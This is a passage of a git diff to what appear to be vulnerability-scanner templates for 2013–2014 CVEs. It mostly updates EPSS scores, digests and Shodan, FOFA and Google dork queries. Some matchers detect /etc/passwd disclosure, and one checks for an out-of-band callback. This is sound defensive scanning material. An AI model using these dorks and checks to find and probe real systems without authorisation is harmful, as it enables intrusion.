cve,cve2013,edb,lfi,javafaces,oracle http: @@ -59,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d411c9cac78be8c4ab9a5bdfbc6d4114b99d7b7056c9bb27e3e32ac184482bea022100f177f6296d1afe8ddedb37e3d67eb07efe63553fae17ea089d4a75ca504e2f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5aaa0cf657fb07a07b2e7f3dbfb89dfcfd5ecbec95eebcc67d0a16b7027742b02205cda39d97b2037ad46ec76430102bb2e98c99138c3a92af1bca614d667d8489c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 1c8d954e50..7cdb37a482 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83801 + epss-percentile: 0.85273 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: anshul_sharma - product: category-grid-view-gallery - google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" + max-request: 2 + vendor: "anshul_sharma" + product: "category-grid-view-gallery" + google-query: "inurl:\"/wp-content/plugins/category-grid-view-gallery\"" tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma - flow: http(1) && http(2) http: @@ -63,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d844efa33df37aa48d1267ca2585b084dd379d47dc44ad0b817d8a8b3889609022100da3ab34a223e01b513a86e460c9db9418b2100aa58e1ad8a38f360238672050a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c958d79410ad591fa2266c2b04eb8d7b3d525fca53a54ead760998f2e163fd26022100c109ae2b7329ce4d425213b85afdd9ff66c41bdf0846af67bac4d362e20a63bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 7b2545baa8..3f732309dc 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -20,15 +20,14 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.85008 + epss-percentile: 0.85273 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: cory_lamle + max-request: 2 + vendor: "cory_lamle" product: duplicator - google-query: inurl:"/wp-content/plugins/duplicator" + google-query: "inurl:\"/wp-content/plugins/duplicator\"" tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle - flow: http(1) && http(2) http: @@ -62,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c8b364798eeaf67eb8fd9661e357a8d0875baf9aaa10872d9215c2389b1e5c50022100e01427f052b0b4953ed298b952a5765c2b6b35dd3c2c4b157568a808db6bd728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204c44193b31a02e7585af9ec5c9df0727f0f1e7b63e659ef93b412bf388a4e29602210099ce26c6f7ced200e5e68bafefba1417b599b21923293f73cfc2b9a71c2855fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 3d944f4bee..0a367dd4ec 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - epss-score: 0.04915 - epss-percentile: 0.92611 + epss-score: 0.07984 + epss-percentile: 0.94272 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201594ab82faa88c2638b590f8d2290c98cbba2ee290211a02a238f09cdf59789e02206977759c62401acb13c22b225a20b6b17866f8aacf67b8a67590ea7f7b0bc8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be02fdac786e491610190b50099a0ce87960337c3a64fadd06f6408ebb147fd4022100b3295a49e65f499266d917bc52808ccfae6264f6b448c06983015d0c26d25b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 255fd4324b..85c15c787b 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 - epss-score: 0.00327 - epss-percentile: 0.70301 + epss-score: 0.0028 + epss-percentile: 0.68344 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203db25db5e5e4de50aae341f22577f8b8d710ac7791654e1776574087a8c3811a022100a2d6c799f3f59792aa66f7430884805852e965ce2a6bd7d03c5af47273175891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 44c34d428f..506c1e58dd 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -27,6 +27,15 @@ info: max-request: 2 vendor: synacor product: zimbra_collaboration_suite + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor http: @@ -53,4 +62,4 @@ http: - type: regex regex: - "root=.*:0:0" -# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index d0998b099d..e094bca331 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 - epss-score: 0.21533 - epss-percentile: 0.96023 + epss-score: 0.26523 + epss-percentile: 0.96738 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cce17b78559a95bf2f0943f96165e78642e273d655b3c17c6881820cc40df09f02207f5a415fa7bf76725f80007066ad4921d9425a34255db8d656c34257296adea3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085e6d112ea7ef4a7833a7668c6b051ac44855b70dd7ec05c658983adcf4680ec022006588657644bf9bde06a06488d6bdb794f501662fbd380395fdcd12e2ad45ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index ac36dc0e9f..a5801ff21f 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.88732 + epss-percentile: 0.88951 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020888617dfe71531e618697e0fcccf4fcafa03fe02c295f230589d7449890a0002201f877c208eb1418846e64b8bc9cd8c4677f3f5464219102de5c4a0c3dbe7dea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 68d8ce7de3..627cea34a5 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -21,13 +21,14 @@ info: cvss-score: 10 cve-id: CVE-2014-2321 cwe-id: CWE-264 - epss-score: 0.96364 - epss-percentile: 0.99452 + epss-score: 0.95464 + epss-percentile: 0.99375 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zte product: f460 + shodan-query: cpe:"cpe:2.3:h:zte:f460" tags: cve2014,cve,iot,zte http: @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022023bcec4a925719964d361455cce2d3185288b3dd03c0a9b3a61f8704b16ca756022100e7f90ae800794e873f1ef774d97e8007a67fbc2cf35e4fde660f40f31f262a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9d734021576f1426ea4a0bd73c67beadc43c253784846f91ddffd41f597880b022100f7963910ee7952b9952e3441d9815f03d92ed7cac15c88325decc2535dbdc943:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 6b84e07eae..099301f4da 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2014-2323 cwe-id: CWE-89 epss-score: 0.96033 - epss-percentile: 0.99445 + epss-percentile: 0.99481 cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lighttpd product: lighttpd + shodan-query: cpe:"cpe:2.3:a:lighttpd:lighttpd" tags: cve2014,cve,lighttpd,injection,seclists,sqli http: @@ -40,4 +41,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4b0a00483046022100e371572751932d4a500df96a892091eba4e0a4d8ce6a52634b13e38cd64f05cc022100dcb4be0eedfb4cb66a15ce756a7a6db6b4fd32eb5bd445bc094c025d8706bfd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc41963e152cb80e35da8316c109132de19ba635d41d2245381f2aaa2dff5cce022100b03b8f8c2427915570f9d5409a48ee44032f1e4e53c6ad8d22c5fb31353f4170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index bd7dd109a6..b8bb69ab43 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2014-2383 cwe-id: CWE-200 - epss-score: 0.00511 - epss-percentile: 0.76134 + epss-score: 0.00363 + epss-percentile: 0.72296 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205cb959d082fabd4770f37fc68ad58966bd0be9ae6c3d679ca44b58065853a807022100a108783e71b8909c00ec2219ba21bd0eb739d3abc0b5e6b9f9ea0ee7d85cbf69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b7c90a2cfbe459a87dbbb307df3db7b44141074b36c34f8a61575b2ca7591520221009ea5a6ab23f19df671509f8466d795fcbeb8d48d995c89926ced47f9d3c8cd98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 3ac2dfa0fe..41976e5eb4 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.3 cve-id: CVE-2014-2908 cwe-id: CWE-79 - epss-score: 0.00594 - epss-percentile: 0.76056 + epss-score: 0.0045 + epss-percentile: 0.75068 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a67b8f296a38cdec3cc9fadbed079d23964fcd5973e2a30a4ebc3588772051e022100acee6714b419eaf8cf4ab99aef816ab12d1a04410e9aef0c8a18a45744943b0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e07a87ca92a45e0c3e683810fe75ea4e13ef439d9c0761076ae7b1b3fedf1e402200f35676062726a99b31baaabd9878723ace952a9551ab845fb96fca30fd34799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 1b31232ed7..84a5c2a95d 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.8 cve-id: CVE-2014-2962 cwe-id: CWE-22 - epss-score: 0.95825 - epss-percentile: 0.99395 + epss-score: 0.95717 + epss-percentile: 0.99419 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032e80b0db58d467a4ce0dccb54620714fa677489117263f882c989d96adb1e9b022100a4a43436790a6bfae53280a94851a270b2f0ae270d5b78e1c53f5be7f1911963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fef1c81653b445d6876bb813525f0ad4a8d2f3bce3bf5fac3b7ae67f02ab55c9022100a8189aa1f6dba2f15e80d4fb511041f7e6a5e5921e7e9e82e118a1cb99f33559:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index c28ab34ad6..c9630b30e8 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -22,12 +22,13 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.53209 - epss-percentile: 0.97551 + epss-percentile: 0.97602 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic http: @@ -71,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c75efbf9b064d21bacbd48c486b930e90217b4ae6e2d0ae67761ed727e5ae1c022100e524324c159f69fa14357b63d62c412273768e8b0377d797d5d02df83e454767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201147887d505805312869c53cf391931fb435d6ebb2a345de1298e9952e16582f0221008773ca103f3f110dd79ec2c08eff64ab0ea1d59fa388f1d9470371900fc9f0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 1eef11da3d..813bdf1493 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.2561 - epss-percentile: 0.96594 + epss-percentile: 0.96696 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 @@ -43,4 +43,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a0047304502201815e842a6507b325c3c41ae861767b65c91d7bd0ecd902cb49d98f19d29271e022100f2778429020bce6c05a2f84057ce4f23a7070d63855d64359c7779a19600d4e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049b8ea9cbd2fa929aa91ebd5b734ff975d68a95cb7309c5722750786994f087f022100d8d5e0f1863f9e622519db5e0f48835399352bb411c8fffc895001144cbea940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml index 5882453bd0..41aa5161be 100644 --- a/http/cves/2014/CVE-2014-3704.yaml +++ b/http/cves/2014/CVE-2014-3704.yaml @@ -21,14 +21,16 @@ info: cvss-score: 7.5 cve-id: CVE-2014-3704 cwe-id: CWE-89 - epss-score: 0.97537 + epss-score: 0.9753 epss-percentile: 0.99992 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve2014,cve,edb,drupal,sqli variables: num: "999999999" @@ -52,4 +54,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402207af10a42ac3fac82b8537fcd02ef03a3d6d1c789570c336dd960af2488b7656a02200bf8bf6552331293f0e50b7c92c5874a81bc4df67abaae00fa0bd4042a8ea2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024a1654afe7bde29b350accd5cf34bb2575b99274016117766b2d7a6b9e5a659022100add0a9c974f07fc406642d59899f025dd12cf87ed60f6ec3d0ec43f1db290caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 3bf155e20d..a4025a14c3 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77635 + epss-percentile: 0.79778 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs product: node.js + shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" tags: cve2014,cve,lfi,nodejs,st http: @@ -43,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203d8c11ba1a31ffd7910585875338d74bcd708cd45c0dced1bc16f9ac789f0d3f022100d17f317a0370341a66779fb76b7e4559c2db7104613304dbd1455b6344151bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205aac669d4a5a54dc948c50fd092acac57e7866b919782b44ac4830002791e4c20220754b3c310957be2dcb62fcf22f2dae9be958dd7d837d96fdaae4bab0f1ac0b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 1f6974f7c3..2a11e6bcce 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -20,14 +20,21 @@ info: cvss-score: 5 cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo - epss-score: 0.96955 - epss-percentile: 0.9967 + epss-score: 0.96657 + epss-percentile: 0.99634 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: fusion_middleware - shodan-query: title:"Weblogic" + shodan-query: + - title:"Weblogic" + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" + google-query: intitle:"weblogic" tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss http: @@ -50,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b0c4c45a1197068fe3d1c2e791783fc70cbcc9d3206f6e804636e2d200cef0c022100fc157a501cabd7d4201b7164e0daf392f982fa00c7962aa21e21c9b38dbd4618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a63eab7b54366342f1b6a8a82ef216a6edc6d8c9a6795c72c0a0ce05f550ef6022100cf1749334747c537d68a8de0b2f3776daa8470c99898c000e40a52baf65817a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 8ed5d7e85b..236ee0ab9e 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -21,13 +21,12 @@ info: epss-percentile: 0.50288 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: activehelper - product: activehelper_livehelp_live_chat + product: "activehelper_livehelp_live_chat" framework: wordpress - google-query: inurl:"/wp-content/plugins/activehelper-livehelp" + google-query: "inurl:\"/wp-content/plugins/activehelper-livehelp\"" tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper - flow: http(1) && http(2) http: @@ -61,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c70973326dc4da5c4130c3180aa50e32ccedebe17dfc3e2135ce622c7d93307b022029ca8cebdadfded9c3a554c78cf22248ac02a412d228fa50c9063bc9be53c4bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1f86d3ec7d2e6dfb36bac1a7e60ca7b6da6c8baa6adb4f718027338d1740c15022100ed08ccc5e4520863607f6efbb5f4a404313db14d9555c38335514b6e415e2127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index f66829fb81..b4341d4c90 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -23,12 +23,11 @@ info: epss-percentile: 0.48664 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: import_legacy_media_project - product: import_legacy_media + max-request: 2 + vendor: "import_legacy_media_project" + product: "import_legacy_media" framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project - flow: http(1) && http(2) http: @@ -61,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c947aed3c99938dc952b322d6f2b1729438092660b31ff1c90783264a24cb01a0220265888536b4943a2204bc4141bffa43c67384e2b3be7f962cbf86d397dde8d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022019cf3e791bbae0f3f2e1eb697da72e6a37013d18a36e3798631582753c15668302206547f6bb88ad146e68edea57b590269baaa8acd02b511b984549cb0a27577867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 8c002e1bc1..9fa5ec7540 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -14,22 +14,24 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - http://wordpress.org/plugins/infusionsoft/changelog - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.50857 + epss-percentile: 0.50948 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: katz - product: infusionsoft_gravity_forms + product: "infusionsoft_gravity_forms" framework: wordpress - google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" + google-query: + - "inurl:\"/wp-content/plugins/infusionsoft/Infusionsoft/\"" + - inurl:"/wp-content/plugins/infusionsoft/infusionsoft/" tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz - flow: http(1) && http(2) http: @@ -66,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204632ba857d80985897ff6ed55d02178be53aea7b5bbeeb24fcd6e920d59022ed022100e4aa6568eb57f3a3597613e71186f142e2d44b6a70d5ad43a297aa76e6a2d89b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205aa37dff36e99fa14fe63b36c5d0ef979d821d46b43121abc1e3e3ccdcf64566022100fd478a8bc9605330f494e6d18a8618953dde211c346e17e043c0688e346066c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 41d512b06b..8c3f42d92f 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -20,15 +20,14 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: movies_project + max-request: 2 + vendor: "movies_project" product: movies framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project - flow: http(1) && http(2) http: @@ -64,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022030275d63dbfe56697607c6334a3c8a5811e5cb33d54692005337774bf344cebd022100afc9d9c7a60dabf6c42cb4ed7d333e4e6591ba5fba7baeaaf2b7af52de3126c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023db777acbf598abe093c11f43fad259d6521602433ae7f60f8beb0976312ac5022071aca9c91f38217e6ec63147c4de56c462ad92ef280921285b2f019a6e7367ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index d438956a11..a884662c26 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45595 + epss-percentile: 0.45869 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b012a51490d4c5d00cbed0728997b52b855ebf28d0bc90d673677e88eda9db4022100d96a4915d878a3c91ec2e3a7fc2baa07140914b1c5549999e941d5e0d9beae3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b9e90974629c38dc7ba24b6c065893128fb49899c54b1d432a9354d6bf979f1022069e559bb2ed3a7b79110890ab03412a524f3603138b600753467d200c26c1f29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 64a4b59675..d175541783 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -22,13 +22,12 @@ info: epss-percentile: 0.48556 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: visualshortcodes product: ninja framework: wordpress - google-query: inurl:"/wp-content/plugins/shortcode-ninja" + google-query: "inurl:\"/wp-content/plugins/shortcode-ninja\"" tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes - flow: http(1) && http(2) http: @@ -61,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202d3cefb43338cd1d7fdec604f7e6f35630a7efd4c31ced1daf4d5d06bda5fbf3022100bd9e9e1c3b3766f433b39af8bb873b97144e038899c49bd8bae8a4cfdc884985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f091ab784d25a99ca8add1132fc9a271ed1a7ab4144f8d6a56e575874cac7a920220291c6b38c1874086be3f44800218095439c6cf99598a330979ae8633866a0bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 